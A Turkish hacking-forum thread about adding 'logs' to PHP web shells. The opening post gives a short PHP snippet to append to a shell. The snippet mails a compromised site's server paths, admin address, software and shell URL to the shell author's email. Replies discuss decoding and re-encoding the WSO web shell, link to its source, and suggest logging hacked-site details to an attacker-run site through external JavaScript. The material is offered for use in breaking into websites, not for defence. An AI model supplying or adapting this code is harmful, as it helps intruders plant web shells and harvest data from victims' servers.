Shell'e Log Koyma

Evet arkadaşlar. İlk başta hack'e başlayanlar genellikle shelle ihtiyaç duyar ve internetten bulduğumuz shelleri indiririz. Tabii ilk başta acemi olduğumuz için logmuş şuymuş buymuş bilmediğimiz için öylesine kullanıyoruz.
Neyse shell log koymak için shellimizin sonuna
alttaki kodları ekliyoruz. ve sheller direk e postanıza gidecek. Alttaki e postayı değiştirin ya da olduğu gibi bırakın
Ayrıca shellinizi decode edip düzeltmek için https://pr.gg/base64/ bu siteden kodları görebilirsiniz.
Örnek:

<?php
$kime="hacker@gmail.com";
$baslik="SadrazaM Server Avcisi V1.0";
$spyhackerz="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."\r\n";
$spyhackerz.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n";
$spyhackerz.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n";
$spyhackerz.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
$spyhackerz.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n";
mail($kime, $baslik, $spyhackerz);
?>

 

Faydalı +1

 

Güzel Paylaşimda tam olarak acıklarmısın kanka

 

Şimdi shellerde log olur. Yani bir siteyi hacklemek için siteye shell yüklenir. Sen shelle girdiğinde site bilgileri ve shell adresi o kullanıcıya gider. Yani o kullanıcı rahatlıkla senden öncede sonra da hackleyebilir.

 

loglu shellerin geneli artık maili kullanıyor eskisi gibi sitede saklayan pek kalmadı +1

 

gmail yerine hotmaile bağlasak sıkıntı olurmu reis ?

 

http://i.hizliresim.com/5Y9jEl.png
Böyle Yaptım Reis Sonra Decode İle Çevirdim Kendi Shell Adreslerimden Birine Yapıştırdım Emaile Gelmedi Reis Ben Nerde Hata Yaptım Yardımcı Olabilirmisin ?
http://i.hizliresim.com/A32j8r.png

 

http://i.hizliresim.com/5Y9jEl.png
Böyle Yaptım Reis Sonra Decode İle Çevirdim Kendi Shell Adreslerimden Birine Yapıştırdım Emaile Gelmedi Reis Ben Nerde Hata Yaptım Yardımcı Olabilirmisin ?
http://i.hizliresim.com/A32j8r.png

Bu tür kodlamalarda olmaz ama bana bilgilerini at yapabilirsem atarım sana

 

gmail yerine hotmaile bağlasak sıkıntı olurmu reis ?

 

gmail yerine hotmaile bağlasak sıkıntı olurmu reis ?

hepsinde olur.

 

@Hacker047 verdiğin siteden .eviriyorum . siteye attığımda kodlar çıkıyor shell çıkmıyor . bozuldu yanı shell . ne yapayım ?

 

@Hacker047 verdiğin siteden .eviriyorum . siteye attığımda kodlar çıkıyor shell çıkmıyor . bozuldu yanı shell . ne yapayım ?

Hangi shelli kullanıyorsun? ver ben bakayım

 

Mail fonksiyonu kapalıysa?

 

Hangi shelli kullanıyorsun? ver ben bakayım

wso shell

 

wso zaten loglu onun decode edilmiş halinde log olan kısmı bul, encode et orjinali bozmadan. maili kendininki ile değiştir. ama hatırladığım kadarıyla encode wso sağlam combineli idi. ama imkansız değil. piyasadaki en çok kullanılan wso sağlam biri tarafından encodeydi.

 

wso shell decode : https://github.com/tennc/webshell/blob/master/xakep-shells/PHP/wso.txt

 

https://gist.github.com/jharshman/e7baf00bbff911e9522d2e1f11ae6a37/

adam sağlam encode etmiş. wso güzel shell ama kullanmıyorum. ek özellik eklemek zor benim için wso ya. indoxploitin shellini editledim. artık bypass shelli adminer gibi tüm özellikler mevcut. ayrıca kendi logumda var içinde.

 

PHP'nin mail fonksiyonu kullanmak çok mantıklı bir hareket olmayabilir. Bunun yerine bir script kodu çağırılıp loglanması daha doğru olur. Çünkü her server'da mail fonksiyonu aktif şekilde çalışmak zorunda diye bir kaide yok. Ayrıca her sayfa yenilemesinde bir kez mail atıcak. Zaten mail fonksiyonu sunucular da çokta sevilmeyen bir fonksiyondur. Kesin göze çarparsınız. Buda benim fikrim

 

Dediğin doğrudur dostum. root.infonun kullandığı dışarıdan js çağırma tekniği ile de bu sorunu çözebilirsiniz. hostingerden bir site açıp logları txt ye yazdırabilirsiniz.

 

Çalışmıyor

 

mesala siteyi hackledik ve indexe bu kodları yazdık . ste sahibi indexe tıkladı ne gibi bir faydası olacak. keylogger gibi mi olacak? diyelimki site sahibi tıkladı ve sonra siteyi tekrar açtı. sonra ne olacka*

 

Kesin çalışır mı ?